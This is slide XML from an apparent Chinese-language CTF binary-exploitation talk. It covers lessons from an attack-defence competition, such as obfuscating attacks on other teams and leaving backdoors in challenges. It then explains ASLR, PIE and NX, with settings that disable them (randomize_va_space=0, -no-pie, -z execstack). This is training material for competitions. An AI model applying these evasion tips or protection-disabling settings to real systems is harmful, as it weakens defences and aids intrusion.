            <a:ext cx="56388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堆利用 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bin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400C16B-BA15-428D-A9E4-15DD36083A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30002" y="1527193"/>
            <a:ext cx="9531996" cy="2862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分析流量的时候才发现平台提供的流量只有进来的流量, 没有从服务器返回的流量, 所以看不到完整的交互, 所以根据流量生成exp的脚本几乎没怎么用到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打别人的时候没有加混淆, 打了3, 4轮就打不到了, 都被patch了, 而且还看到了别人用我们的流量打我们, 不得不说有些队复用效率太高了</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打别的队的时候一定要加混淆</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>awd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>题目的话出题的时候可以多留几个后门</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>要不然也不会像这次一样打个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>轮就打不了了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>而且也可以加一些反调手段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>争取可以多打几轮</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>较新颖的姿势一般不会出现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>awd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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7618079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C7344ED5-3D2F-44DB-9DBF-AEA8068E8317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="1008615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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ex1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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内存保护措施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CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2230582" y="2287184"/>
            <a:ext cx="773083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ASLR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PIE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the NX bits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Canary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RELRO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83575868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64D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574373" y="1982410"/>
            <a:ext cx="945162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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Address Space Layout Randomization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49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ED9C22A-5D8D-45A8-AFE4-EA789B4661AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2530527" y="2274798"/>
            <a:ext cx="6930921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lang="zh-CN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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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防护措施，程序装载时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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/proc/sys/kernel/randomize_va_space = 0：没有随机化。即关闭 ASLR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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/proc/sys/kernel/randomize_va_space = 1：保留的随机化。共享库、栈、mmap() 以及 VDSO 将被随机化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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/proc/sys/kernel/randomize_va_space = 2：完全的随机化。在randomize_va_space = 1的基础上，通过 brk() 分配的内存空间也将被随机化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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29CE5CC-8CD5-44F7-9E04-FC0F15795CFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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内存保护措施 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ASLR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1574497542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64D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822232" y="2630775"/>
            <a:ext cx="854753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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Position-Independent Executable)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="020105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17313B0F-0FE6-4A22-8675-66671999FA13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4039382" y="3313565"/>
            <a:ext cx="411323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24292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程序的防护措施，编译时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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随机化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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ELF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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文件的映射地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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开启 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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PIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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才会生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill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-no-pie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill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编译时关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill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pie</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:effectLst/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9331CE3-3F4F-46C3-B115-FBBE4D0060E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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内存保护措施 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PIE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1023138665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64D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2376374" y="2272445"/>
            <a:ext cx="764343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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>The NX bits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(the No-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bits)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="020105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5ECC1460-F870-4071-A98C-D5293B8E0327}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269141" y="2857220"/>
            <a:ext cx="7280856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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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rgbClr val="FF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程序与操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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的防护措施，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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编译</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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时决定是否生效，由操作系统实现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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通过在内存页的标识中增加“执行”位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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可以表示该内存页是否可以执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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若程序代码的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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执行至不可运行的内存页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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则 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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将直接拒绝执行“指令”造成程序崩溃</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292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execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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打开栈的可执行权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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</a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US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8722240-77B5-466B-BAC5-2FFB6EFF22B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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内存保护措施 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The NX bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="722014286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Shape 1374">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5DA647-DD17-40C0-8F42-5F9F885360A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5505940" y="1397047"/>
            <a:ext cx="5193300" cy="4734867"/>
            <a:chOff x="3771275" y="1085100"/>
            <a:chExt cx="3894975" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Shape 1375">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED360C0-0076-43AE-B5FE-08DBFE6D67D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>
              <a:ext cx="1363200" cy="2742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867" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>For Kernel</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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" name="Shape 1376">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BA68F7-E71B-4C7B-B3CE-59EC58C2AA5C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1486975"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF2C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rPr>
                <a:t>Stack</a:t>
              </a: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" name="Shape 1377">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6FA70D-C4BA-420B-B9F5-D2F0CD5A2E47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1761175"/>
              <a:ext cx="1363200" cy="6039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" name="Shape 1378">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4E8817-DA2C-43C5-AE04-5ECAF60D3970}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2365075"/>
              <a:ext cx="1363200" cy="4428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rPr>
                <a:t>shared libraries</a:t>
              </a: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" name="Shape 1379">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB6F4F48-BE76-458F-B4B1-B258210B9E2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="2807875"/>
              <a:ext cx="1363200" cy="6039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" name="Shape 1380">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863ABAE6-56DB-4A27-8D1E-97138CAC328B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3411775"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D9EA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rPr>
                <a:t>Heap</a:t>
              </a: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" name="Shape 1381">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED23B8A8-D327-4F72-98A6-D0F8C5B21692}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3685975"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F4CCC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rPr>
                <a:t>Data</a:t>
              </a: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" name="Shape 1382">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A39990-BD4B-4922-BA48-67B641A998CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="3960175"/>
              <a:ext cx="1363200" cy="274200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF2C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rPr>
                <a:t>Text</a:t>
              </a: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" name="Shape 1383">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA78317-91AE-4D3C-AE95-1C06197F6F69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="4234375"/>
              <a:ext cx="1363200" cy="2742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867" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Unused</a:t>
              </a:r>
              <a:endParaRPr sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Shape 1384">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98A331F-B003-4133-9D1A-CABFFD7C2AF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="5" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="367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3" name="Shape 1385">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{088D8FB8-845D-4E29-9847-8D00D96BDB4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="334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4" name="Shape 1386">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6363E9DF-AEE0-493D-9780-F27B819E8778}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100"/>
              <a:ext cx="1047000" cy="27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r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>0xFFFFFFFF</a:t>
              </a:r>
              <a:endParaRPr sz="1333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15" name="Shape 1387">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6168F1E5-F016-460B-9D3D-14365F0CB522}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1359300"/>
              <a:ext cx="1047000" cy="27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r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333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16" name="Shape 1388">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E273D0-7BA2-4CE1-B0D2-C58432A8D362}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="2674225"/>
              <a:ext cx="1047000" cy="27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r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>0x40000000</a:t>
              </a:r>
              <a:endParaRPr sz="1333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17" name="Shape 1389">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F1CFCE-7071-4407-979C-E969CA241988}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550"/>
              <a:ext cx="1047000" cy="27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r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>0x08048000</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Shape 1390">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C9DA192-F45B-42DB-97EA-E5BC5597165A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750"/>
              <a:ext cx="358500" cy="6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9" name="Shape 1391">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
